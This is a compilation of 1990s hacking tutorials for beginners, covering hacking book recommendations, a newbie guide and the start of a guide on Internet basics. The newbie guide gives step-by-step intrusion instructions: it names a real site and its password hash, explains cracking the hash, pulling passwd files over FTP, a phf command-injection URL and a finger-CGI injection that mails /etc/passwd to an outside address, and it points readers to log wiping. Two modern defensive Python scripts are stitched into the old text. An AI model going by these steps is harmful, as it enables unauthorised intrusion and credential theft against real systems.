You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY : Of course, Maximum Security has to be at number one. I guess this would probably be the central book in any hacker's library. Goes through a heap of techniques like a textbook with over 900 pages.
2. THE HAPPY HACKER : Essential for newbies. Although this book is bagged a lot by people who hate Carolyn, I think most people agree it would be the perfect first book a newbie should read. Explains things pretty well, spelling mistakes and all, but probably an essential newbie primer. Though, as I say, if you know your stuff you can safely forget this one.
ESSENTIAL SOFTWARE:
1. LINUX : You will need to change to Linux to do any serious hacking. But thankfully, it is fairly simple and you can just set up Linux in a separate partition on your hard drive and set for a dual boot option: usually Windows, and when you are hacking, Linux. Your amount of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest version, not an obsolete one. There are also several different 'flavours' of Linux; you will probably want to start with RedHat, then possibly move to Slackware after a year or so. So, make sure you get a deal which gives you the opportunity to check out some of the different distributions. By far the best Linux deal I've found around is this one. It has an excellent Linux manual, and comes with three separate Linux distributions on 3 CDs, including the very latest RedHat and Slackware. It's also excellent value (about half the price of buying the single 'official' RedHat CD).
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN : The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you anything, so stuff it if you just want to learn. Although it was one of the best reads I ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about the same, but this one deals a lot with phreaking, and scamming radio stations of cars. But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn stuff.
4. THE FUGITIVE GAME : Online With Kevin Mitnick: Again, a really fun read (though, I prefer the Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here because it is such a good read. It's also a really cheap buy.
5. TAKEDOWN : The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story (written by the cops who chased him). Interesting, but the essential Mitnick book is the one above. Though, this is a very good primer on how the FBI operates to capture hackers. But, again, no techniques listed. For techniques, you would only have luck in the first two books listed.
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER : This is another book that a lot of people have. The book seemed like a real waste of time to me.
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.


CONGRATULATIONS:
You have gained access.
If you now have the login code and password, you may use the user's mail account, FTP privileges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).

Hacking For Newbies

Made on August 19, 1997.

Introduction - OK, this file is intended solely for people who know very little about hacking, and when I say very little I mean very little. Now, for those of you jumping happily around and screaming "Finally, I am gonna be a hacker!" stop jumping around and just sit down, take a few deep breaths, and just relax.

After reading this file you should be able to hack
1 - A WWWBOARD,
2 - FTP/UNIX sites,
3 - Website Tricks, and
4 - Neat stuff/Misc. with much confidence.

Now, on to the disclaimer:
*** I will NOT be held responsible for what you do with this information. ***

NOTE: All commands that are written in this file, with the exception of the John the Ripper commands, like "edit passwd" are for DOS, so if you have UNIX use the VI editor or something of the sort.

OK, now there is no specific table of contents for this file, I am pretty much just going to make it up as I go along. Now, for you advanced hackers out there, I would recommend just leaving this file because you probably won't find much in this file that you don't already know. All right, now that I'm done with this stupid raving rant, I can start explaining how to go about learning what you want to learn.

1 - How to hack a WWWBOARD (Credit going to kM of www.hackersclub.com for coming up with this brilliant idea, let's all applaud kM.)

OK, now obviously, in order to hack a WWWBOARD you need some sort of password file. Now, by default the passwd file is in the WWWBOARD directory. Most people who run the WWWBOARD think to themselves "Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?" Well, the odds are pretty damn good. Now, when I say hack I mean both just to explore and just to do fun stuff like deleting files. I am not saying deleting files is GOOD, but sometimes it is fun. Anyway, the passwd file is almost always in the WWWBOARD directory, so let's take a real WWWBOARD.

The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/. Now, if you go to that URL you will see a listing of files. For the purpose of this file ONLY, and not malicious intent, I have not alerted the site of this problem. Now, go to that URL and click on the file passwd.txt. You will get two words that look like this:

WebAdmin:aepTOqxOi4i8U

The first word, WebAdmin, is the username of, obviously, the operator of this WWWBOARD. The second "word" is the password. Now, you're probably sitting there looking at that word thinking to yourself "God damn, that is one funky password!" Well, stop thinking that because yes, that is the password, but it is encrypted. So, you have to get a password cracker. Now, I recommend one of two password crackers, either CrackerJack or John the Ripper; both of these can be found at http://www.hackersclub.com or almost any other hacking site. Once you go and get a password cracker you will most likely need a word file. Those too can be found at http://www.hackersclub.com. Once you get the necessary stuff, you will need to copy the password file, WebAdmin:aepTOqxOi4i8U, and paste it into an empty Notepad file or something of the sort. Now, you are probably thinking to yourself again "Alright, now I can crack this bad-ass of a password and become a hacker!" Sorry to rain on your parade, but no. Yes, you might be able to crack the password, but then ask yourself one question: once I've got the password, what do I do with it?? Do I go mail it to the server www.cobleskill.edu and say "Hey, I got your passwd, now give me complete access to your WWWBOARD!" Sorry, if you do that, you will be thinking for about 10 years in prison "What did I do wrong?" or you might become Bruno's sweet boy. Sound like fun?? Didn't think so. OK, now IF you crack the password file, and you get the username and password, unencrypted of course, paste it into a text document or something, then add this right onto it - ":-2:-2:anonymous NFS user:/:/bin/date" What that will do is turn the WWWBOARD passwd file into a UNIX passwd file. If you don't do that then you will never crack the file.
All in all the passwd file should look like this: "WebAdmin:aepTOqxOi4i8U:-2:-2:anonymous NFS user:/:/bin/date" Now, I don't use CrackerJack, so if you got that I can't help you, but if you got John the Ripper then type in this command in DOS : "john -pwfile:xxxxx -wordfile:xxxxx" XXXXX is whatever you named the passwd file or the word file. For example, "john -pwfile:hehe.txt -wordfile:WF.txt" It should just screw around for a while and compute stuff and then if it is cracked you will get on the left side of the screen the passwd, WebBoard, and the username, WebAdmin. Now, WebAdmin and WebBoard are the two default username and passwds. Shows you about security these days. Now, once you got those two things, go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL. If none of those are there then you should examine the rest of the files in the directory. When I was in the directory the file wasn't there, but I found it nevertheless. I am not going to tell you what it is, but once you find it you will get something like this:
WWWAdmin For WWWBoard

Choose your Method of modifying WWWBoard Below:
Remove Files
Remove Files
Remove Files by Message Number
Remove Files by Date
Remove Files by Author

Password
Change Admin Password

That is, you guessed it, the little "Operating Station" for the WWWBOARD. Now, to do any of those things you must have the Username and Passwd that you cracked. So, click on an option and I think the rest is pretty much self-explanatory. I really do not recommend trashing the WWWBOARD, some people depend on them to get a lot of questions and answers, etc. I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable.

2 - Hacking an FTP site

OK, now hacking an FTP site WAS pretty easy a while ago, but nowadays most passwd files are shadowed, which adds a little bit of extra security. I'll explain it later. OK, now, just before we start, the passwd file on UNIX machines is "passwd" not "passwd.txt." OK, now, for the example site we are going to use http://www.freestuff.com. Now, the information I am going to give you will not let you hack this site because the passwd file is shadowed, as is almost every single website, but nevertheless, if you "experience" hacking long enough, you will find the answer on how to get the file. OK, now the first step is to do 1 of 2 things: get an FTP browser, like CuteFTP or BulletFTP or something, or you can use Win95 FTP, which no one really knows about and how I found out is beyond my memory. OK, I will explain the FTP browser way first. OK, fire up the FTP browser and for the host name plug in www.freestuff.com and for the port leave it at whatever it is, and hit connect; if there are any other options, then just screw around with them for a while and you'll figure it out. Anyway, for the access type or whatever, click on Anonymous, and after you hit connect you'll get some directories in the Remote Host box, and some other neat stuff in Local Host. Now, in the Remote Host section you want to double click on the "etc" directory if it is visible; if it is not, then see in the pull-down menus if there is an option called custom command. If there is then click on it and for the command type in "cd etc" and it will either say "OK, CWD command accepted" or something along the lines of that, or it will say "..:Access Denied" or even "Error:There is no file or directory by that name." If you get the CWD command accepted then we're in business. In the /etc/ directory you should see a file called passwd.
If you don't, then go back up to custom command and for the command type in "get /etc/passwd" and it will either say "OK, Port command successful" or it will say "..:Access Denied." If you see that file then you can just drag the file over to local host and then click on the button "Start Download" or "Start Query" or something like that.

Now, if you have Win95 FTP you will have to go to the Start Menu MS-DOS Prompt and type in "FTP WWW.FREESTUFF.COM" and it will show up a bunch of neat little messages like "connecting to www.freestuff.com" and other stuff. Eventually you will get to the login screen where it will say "(USER)" or something interesting and long like that. Now, for User type in Anonymous. If it accepts it will say "Password" or it will say, "Anonymous access not allowed on this server." Now, obviously the FBI or CIA is not going to allow ftp access, so don't even try it. Now, if you get to the password part, just type in something interesting like "Suckhole@" and the ftp server will fill in the rest. You can make it anything you want. Now you'll either get 1 of 2 messages, within a marginal error, "Cannot set guest privileges" or this "Anonymous access allowed, guest privileges set." Those should be the only two that you get. If there are any others, these messages are pretty much self-explanatory. Now, when you log on, the first thing you want to type is this command "pwd." Just that; it will display the current directory that you are in. You want it to say "/." If it doesn't then type this command about 3 times "cd .." That will take you down 1 directory/subdirectory. Once you get to the "/" directory, type this command "ls -a." It will list all the files in the directory, including the hidden ones. Now, if you see something in the listing that says "etc" then type this command "cd etc." That will move you into the "etc" directory. Just to be sure, type in "pwd" again to make sure you're in the "etc" directory. If you are, then good, and type "ls -a" again and you should get some of these files: "Pwd.db, passwd, group, netconfig, net.config, or maybe even master.passwd." The two files we are most interested in are "passwd" and "master.passwd."
I think what the files hold is kind of self-explanatory, but I'll tell you anyway: the "passwd" file holds all the usernames and passwds that are on the entire system that you're rooting around on. The "master.passwd" file will only show up if the passwd file is shadowed, and it also means the SysAdmin is a complete brain puppy. Forget "master.passwd" for now. The command you want to issue to this system is to get the "passwd" file from their computer to your computer, and we do that by simply typing "get passwd." It should barf up some neat stuff, and then start transferring the file. When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the "ftp www.freestuff.com" from. Now, you just want to type in "quit." That will log you off the server. Now, if for some reason right when you log off the server you want to log back on, just hit the "F3" key and it will pop up your last command. Now, what you want to do is move the passwd file to wherever your passwd cracker is. You can do that by typing "move passwd X:\XX." X is the drive that your passwd cracker is on and XX is the directory the passwd cracker is in. Then it should say something like this: "passwd -------> X:\XX -->OK" or something like that. Once you have moved the passwd file go to the passwd cracker's directory and open up the file by typing "Edit passwd." If the file has a bunch of stuff that looks like this:

root:x:x:x:x:x:x:
daemon:x:x:x:x:x:x

If it looks like that, not all the x's, just one by the usernames, then the passwd file is shadowed and can't be cracked, might as well delete it (More info on shadowed passwds at the bottom of this file). If it isn't shadowed then just type in the passwd cracking command and get ready to hack a server! I still highly recommend not doing any damage; there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you. But don't worry, 8 out of every 10 servers that are aware of having an attempted hack don't report it and just go about their business. Now, one more thing, if you get on the server with root access (basically root means that you can do anything, you are God on this system) then there are log files that record what happens to you. Now, I think I am handing you more than enough information, so I am going to let you find out how to wipe your presence from the system; there are plenty of .txt files out there that tell you how to do it.
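The shadowing check above is one a sysadmin should run on their own box rather than read off a stolen file. The following is an added example (not part of the original file) that parses passwd(5)-format text and reports accounts whose hash still sits in the world-readable passwd file, accounts with an empty password field, and extra uid-0 accounts; the sample records are constructed.

```python
"""Audit /etc/passwd contents for the weakness this section describes:
password hashes kept in the world-readable passwd file instead of shadow.
Added example, not from the original file; the sample below is constructed."""

# Constructed sample: a shadowed root, a locked daemon, an unshadowed user,
# an empty password field, a second uid-0 account and a malformed line.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/sbin/nologin
alice:aepTOqxOi4i8U:1001:1001:Alice:/home/alice:/bin/sh
guest::1002:1002:Guest:/home/guest:/bin/sh
toor:x:0:0:second root:/root:/bin/sh
# comment lines and blank lines are ignored

broken:line:with:too:few
"""

# Values that mean "look in the shadow file" or "account locked", not a hash.
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!", "*LK*", "NP"}


def parse_passwd(text: str) -> list[dict]:
    """Split passwd text into records, skipping comments and malformed lines."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a passwd(5) record; report elsewhere if you care
        name, pw, uid, gid, _gecos, home, shell = fields
        try:
            uid_i, gid_i = int(uid), int(gid)
        except ValueError:
            continue  # non-numeric uid/gid: also malformed
        records.append({"name": name, "pw": pw, "uid": uid_i, "gid": gid_i,
                        "home": home, "shell": shell})
    return records


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (account, problem) pairs for every finding, in file order."""
    findings = []
    for rec in parse_passwd(text):
        pw = rec["pw"]
        if pw == "":
            findings.append((rec["name"], "empty password field (login without password)"))
        elif not (pw in LOCKED_OR_SHADOWED or pw.startswith("!")):
            # Anything else here is a crackable hash readable by every local user.
            findings.append((rec["name"], "password hash in passwd, not shadowed"))
        if rec["uid"] == 0 and rec["name"] != "root":
            findings.append((rec["name"], "uid 0 account other than root"))
    return findings


def is_fully_shadowed(text: str) -> bool:
    """True when no account keeps a hash or an empty field in passwd itself."""
    return not any(problem.startswith(("password hash", "empty password"))
                   for _, problem in audit_passwd(text))


if __name__ == "__main__":
    for account, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {problem}")
    print("fully shadowed:", is_fully_shadowed(SAMPLE_PASSWD))
```

On a live system, feed it `open("/etc/passwd").read()`; a clean result is one empty findings list, and anything else is a job for pwconv(8) or the vendor's equivalent.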

3 - Website Tricks

OK, now these website tricks are "tricks" to get the passwd file without using an FTP browser.

The PHF Trick
OK, now this phf trick is a bit tricky (hehehe), not to use, but in the fact that some sites have added a command in their HTML code so that if the phf command is issued then it will display a message like "Smile, you're on candid camera!" or it will say this "Your hack attempt has been logged and sent to the proper authorities." Sit the hell down, drop that shotgun, unbar your door, and stop whimpering about how you're going to get busted and raped in prison by Scruffy. 90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt. They just do that to scare the living shit out of newbies or anybody who does that. It is bullshit, so stop worrying. OK, now on to how to do the phf trick. This trick practically never works anymore, but hey, it's fun to try on old school sites and stuff like that. I don't have an example site cause I really don't want to hunt down a site that this trick works on, so go find one yourself and don't send me e-mail about how you can't find a site that this doesn't work on. In order to do this trick the site must have a /cgi-bin/ directory. If it doesn't, then just leave it and forget the whole damn thing on that site, but if it does then keep reading. I am going to make this quick, an example would be this: http://www.Imanasshole.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That will bring up the passwd file, but 95% of the time you'll get this very common and even more very crappy error about how the file doesn't exist. OK, that's the phf trick. Now, onto the finger-box hacking trick.

Finger-Box Hacking
Again for the finger-box hack to work you have to find a website with the /cgi-bin/ directory. I am just going to post the basic outline of commands for this cause my fingers are getting very tired of typing this :-). An example of finger-box hack is this:

http://www.XXXXX.com/cgi-bin/finger

After you type that in you will get a box, if you don't then the finger isn't there or you don't have access to it, and in the box type this:

nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd

Substitute where necessary, I have never actually gotten this trick to work cause I've never tried it more than once or twice cause I never needed it, but I knew about it so go crazy :-).

Rewriting A Web page Right From Your Web Browser
In order to do this trick again you need the /cgi-bin/ directory on your "target" site. For example, type this when you have a website that has the /cgi-bin/ directory:

http://www.XXXXX.com/cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some stuff"%2

"Some stuff" is whatever you want to add basically, but beware, sometimes the web site can track you using the cookies that you sent while on their page, so just to be sure that they don't have cookie requests, if you have Netscape, then in the configuration somewhere, I forget where, check the box that says "Enable alert when accepting a cookie" or something that looks along the lines of that.
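Every request shape in this section (the board's passwd.txt fetched from the web root, a %0a newline stuffed into phf's Qalias, shell metacharacters handed to a finger CGI) leaves a line in the web server's access log. Here is an added example, not from the original file, that scans Common Log Format lines for those three patterns; the hosts, timestamps and lines are constructed, and the rule names are mine.

```python
"""Flag the CGI abuse patterns described in this section in access logs.
Added example, not part of the original file; SAMPLE_LOG is constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Common Log Format: host ident user [time] "METHOD TARGET PROTO" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation-range addresses, made-up times).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/1997:10:01:02 -0400] "GET /projects/archeo/wwwboard/passwd.txt HTTP/1.0" 200 24
203.0.113.5 - - [19/Aug/1997:10:01:09 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1180
203.0.113.5 - - [19/Aug/1997:10:01:30 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%20hi HTTP/1.0" 200 40
198.51.100.7 - - [19/Aug/1997:10:02:00 -0400] "GET /cgi-bin/finger?nobody%40nowhere.org+%3B+/bin/mail+me%40junk.org HTTP/1.0" 200 300
198.51.100.9 - - [19/Aug/1997:10:03:00 -0400] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 210
198.51.100.9 - - [19/Aug/1997:10:03:05 -0400] "GET /projects/archeo/wwwboard/wwwboard.html HTTP/1.0" 200 5120
"""


def classify_request(target: str) -> list[str]:
    """Return the rule names that fire for one request target (path + query)."""
    parts = urlsplit(target)
    path = unquote_plus(parts.path).lower()
    query = unquote_plus(parts.query)  # decode so %0a becomes a real newline
    hits = []
    # 1. The board's credential file is being fetched straight off the web root.
    if "wwwboard" in path and path.endswith("/passwd.txt"):
        hits.append("wwwboard-passwd-exposed")
    # 2. phf: a newline in the decoded query is what lets a second command run;
    #    any %0a or %0d in the query is the tell, whatever command follows it.
    if path.endswith("/cgi-bin/phf") and ("\n" in query or "\r" in query):
        hits.append("phf-newline-injection")
    # 3. finger CGI: shell metacharacters never belong in a user@host argument.
    if path.endswith("/cgi-bin/finger") and re.search(r"[;|`$<>]", query):
        hits.append("finger-shell-metachar")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse CLF lines and return one finding per line that matched a rule."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort the whole scan
        rules = classify_request(m.group("target"))
        if rules:
            findings.append({"host": m.group("host"),
                             "status": int(m.group("status")),
                             "target": m.group("target"),
                             "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        # A 200 on any of these means the hole is real, not merely probed.
        print(f["host"], f["status"], ",".join(f["rules"]), f["target"])
```

A 404 or 403 on these targets is a probe worth noting; a 200 means the file or CGI is actually serving and the fix is to remove the CGI and move the board's password file out of the document tree.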

4 - Neat stuff/Misc.

The first thing I am going to cover is just some very interesting tricks that I know about AltaVista, http://www.Altavista.com. These tricks only involve you typing in something for the search query. OK, here are a list of words and things that will bring up very interesting files from websites:

root:
root
passwd.txt
wwwadmin.cgi
wwwboard.cgi
wwwadmin.pl
wwwboard.pl
passwd (Note: supposed to bring up UNIX passwd files but I haven’t tried it, so if you try it send me some e-mail and let me know what happens).
wwwboard (Note: brings up the wwwboard directories so you can look for the passwd.txt file and other neat stuff).
master.passwd (Note: again, never tried it, so send me some feedback, let me know if it is even actually worth someone's time typing it in, or just a hoax).

OK, those words work in almost any search engine, but work best with AltaVista because AltaVista searches the links on the pages in its archive for your word, and almost every page has a link to its passwd file or something else that is of interest.

OK, now this next trick I thought of when I downloaded HakTek to check it out: it had a feature for deleting mail-bombed messages. Now, if you don't have HakTek, and don't want it/can't find it, then just go into the mail directory of your web browser and delete all the mail, and the mail bomber has wasted his time.

Now I am just going to give you some UNIX commands and what they do, so if you want to be a UNIX fan or LINUX fan then check these out:
cd X - X = the directory that you want to switch to
ls - list all the files in a directory, excluding the hidden ones
ls -a - lists all the files in a directory, including the hidden ones
ls -A - lists all the hidden files in a directory, but not the . and ..
ls -ALF - lists the properties of all the files in a directory
cd .. - goes down one directory/subdirectory
cd . - absolutely nothing!
quit - log off the ftp site (obviously only on Win95 FTP)

Those commands listed above work on BOTH FTP sites AND UNIX machines, now here are commands that work ONLY on UNIX machines:

cat X - the file you want to view
vi - Visual Editor that you can use to edit files
edit - edit files (not sure on this one, works on some UNIX's)
ed - edit files (on all machines)
chmod - change the ownership of a file
help - list of commands that you can use (Note: * next to command means that it is not used on that certain UNIX machine)
man X - for further information on a CERTAIN UNIX command whereas X is the command that you want more information on

Well, that about does it for this file, but I really didn't want to wrap it up so I am going to add some links that will help you A LOT in your travels, so visit all these links for all the tools and other things that you'll need:

http://www.hackersclub.com - A great site, I give it two-thumbs up :-).
http://project-one.com - Under Construction, where this file was intended.
http://hackers.com - Under MAJOR Construction, going to be one of the best hacking sites ever, home of Revelation, I don't know him, but if he is reading this file, then Hi revelation! :-).
http://www.adirtroad.com - TONS of neat things, and TONS of free-stuff links, again, two-thumbs up :-).
http://easyweb.easynet.co.uk/~davegraham/britpack.htm - Brit Hack Pack, there was a rumor going around that their files had virii, that is a bunch of BS, I support them completely, even though I'm not British :-).
http://www.wtp.net/~xeno/main.htm - An all around good site
http://www.geocities.com/SiliconValley/3078/frame2.html - Well, I really only included this link cause the leader of this group and the guy who runs the page loves to cause mass destruction, and he's funny to watch, so keep being funny Senate :-).
http://www.WorkingDesigns.com - Absolutely nothing to do with hacking, just a great place to go if you have any of their RPG games, hope they finish the site sometime soon... and my final link:
http://www.freestuff.com - You remember that site right?? I thought so; guess what you find there???

Well, I hope you enjoyed this file and learned a lot from it, I certainly put a lot of typing into it, so if you really want to send me some money.... I mean a donation, hehe, don't, keep your money, cause I'm sure you have better things to spend it on than giving it to me :-), *mentally smacking myself for refusing money*. OK, well, I will probably write a lot more files cause I enjoy writing Newbie stuff, so well, if you want to E-mail me then send mail to: RAWTAZ@CONNIX.COM

And I will get back to you whenever I can. Hang in there, you'll get there someday :-).

My "Quote" Of The Day (hehe):
Frustrated Person: "WHY WON'T THIS DAMN THING WORK?!?!?!?"
Calm, Clean Shaven Teacher: "Examine it, what do you find wrong with it?"
Frustrated Person: "NOTHING, IT IS BROKEN!!!"
Calm, Clean Shaven Teacher: "You are too quick to anger, learn patience."
Frustrated Person: "WHY PATIENCE, IT'S BROKEN!!!!!!!"
Calm, Clean Shaven Teacher: "It's not plugged in."
Frustrated Person: "Oh, I knew that."
Moral of story: Patience is the ultimate weapon

-Phooey

Hacking for Dummies Volume 2

Hacking for Dummies

Contents of Volume 2:
Internet for Dummies
Linux!
Introduction to TCP/IP
Port Surfing!
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 1
Internet for Dummies -- skip this if you are a Unix wizard. But if you read on you’ll get some more kewl hacking instructions.
____________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzying.
So how about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to serious hacking.
Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples' computers. The little angel on my right shoulder whispers, "Gaining root without permission on other people's computers is not nice. So don't tell people how to do it." The little devil on my left shoulder says, "Carolyn, all these hackers think you don't know nothin'! PROVE to them you know how to crack!" The little angel says, "If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples' computers." The little devil says, "But, Carolyn, tell people how to crack into root and they will think you are KEWL!"
So here’s the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I’ll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagination.
My theory is that if you are willing to wade through all this, you probably aren’t one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in jail.
*****************************
Technical tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else’s computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to jail.
Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don’t count on getting away with it. Backup, backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That’s because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don’t bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cops.
*********************************
Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we’re looking for sponsors who will give cash awards and scholarships to those who show the greatest hacking skills. Now does that sound like more phun than jail?
*****************************
So, let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet.
Note that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every day.
Internet Basics
No one owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experiment.
This anarchic system remains tied together because its users voluntarily obey some basic rules. These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet universe.
To get technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the world.
If you use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line service.
There is the cybercouch potato connection that every newbie uses. It requires either a Point-to-Point Protocol (PPP) or Serial Line Internet Protocol (SLIP) connection, which allows you to run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connection.
Or you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 “Terminal” program under the “Accessories” icon. Once you have dialed in and connected you are just another terminal on this host machine. It won’t give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that host.
But how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet host.
For example, I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexico.
Any computer which can run the necessary software -- which is basically the Unix operating system -- has a network interface or modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently to the Internet.
In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individuals.
Each of these computers has an individual address which enables it to be reached through the Internet if hooked up to a appropriate communications link. This address may be represented in two ways: as a name or a number.
The communications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit into the Internet.
Thus the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet again.
The way most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol suite. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet carries a header with the addresses of the sender and recipient, the information routers need to forward it, and a checksum for detecting corruption. TCP numbers the pieces so that if a packet is lost, the sender will notice the missing acknowledgment and resend it. Each packet is then launched into the Internet. The network may choose a route from node to node for each packet using whatever links are available at the time, and the receiving computer reassembles the packets into the complete message.
These packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the routes are not nearly so tortuous. Communications links may include fiber optics, phone lines and satellites.
The strength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the time.
